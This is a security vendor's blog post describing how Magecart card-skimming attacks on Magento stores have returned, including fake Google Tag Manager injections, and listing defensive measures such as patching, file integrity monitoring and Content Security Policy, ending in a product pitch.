The Resurgence of Magecart Attacks: Modern Techniques to Evade Detection

Magecart attacks (so named as they mostly targeted Magento based ecommerce environments) exploded in 2015 infecting thousands of web sites in one of the biggest campaigns in the history of ecommerce attacks. Back then, Magecart attacks leveraged vulnerabilities within Magento most notably the Shoplift/SUPEE 5344 as previously noted by Foregenix.  In its most basic form, once access to a site was gained, threat actors would inject malicious code that would act as a skimmer, infecting the site’s JavaScript source code. This would target cardholder data and customers’ personal information during checkout.  This information was then base64 encoded (in some cases left as plain text) and exfiltrated to remote systems on the internet which were controlled by the attackers.

Over the years particularly between 2015 and 2022 the number of Magecart attack victims grew exponentially while Foregenix was at the heart of providing expert incident response and investigations helping to quickly contain and eradicate reported breaches to merchants of medium and large-scale enterprises.

Now in 2023, Foregenix is seeing a somewhat of a resurgence in Magecart attacks, with attackers now employing more creative techniques to avoid detection and ensure evasion. Modern techniques observed through investigations conducted lately by Foregenix indicate that attackers start off by breaching computers on the internet  which serve as command & control (C2) servers from which they host their malicious code. The attackers move on to exploit vulnerabilities such as (CVE-2022-24086/7) that have been observed on unpatched Magento sites. Attacks may vary, but recently some compromised sites are injected with malicious JavaScript code in the form of an illegitimate Google Tag Manager (GTM). This would further load malware as a fake payment (checkout) page from the previously compromised legitimate site which acts as a C2 server. This way cardholder data would be harvested and exfiltrated to the attackers’ C2 servers. The above describes how rudimentary Magecart techniques have been used in conjunction with modern attack methods to compromise sites and more effectively evade detection.  To an unsuspecting IT person, the Google Tag would appear as a legitimate piece of code on their site.

Preventing these attacks is one of the best ways to stay ahead of the likely threat of a breach. The following can be undertaken to mitigate these attacks:

• It is important to look out for software updates / patches on a very regular basis for the products your site uses. (This also means the less technologies you use, the easier patch management is.)  Ensure a good patch management policy is in place and is adhered to. Maintaining updated software, including security patches, is essential. By putting in place a strong patch management procedure, known vulnerabilities are immediately fixed, minimising the threat actors’ attack surface.
  
  
• Take an inventory of all JavaScript on the site and conduct regular security audits to ensure this has not been altered or injected with malicious code.
  
  
• Implementation of a File Integrity Monitor (FIM) can never be over emphasised in helping to ensure that unauthorised file modifications are timeously detected, alerted, and responded to contain the breach.
  
  
• Ensure passwords are regularly reviewed and rotated ideally every ninety (90) days
  
  
• Implement HTTP Content Security Policy Headers. This will provide an additional layer of defence against code injection attacks such as clickjacking and XSS

Foregenix provides state of the art cutting edge software capable of detecting and alerting to attacks on the fly.  With a combined total experience of more than 100 years in its team of cyber security experts, these are quickly responded to and contained, ensuring the least disruption to business and revenue generation.

Try our website security solutions for free and see how it can help you keep your website safe.

ThreatView

https://www.foregenix.com/solutions/threatview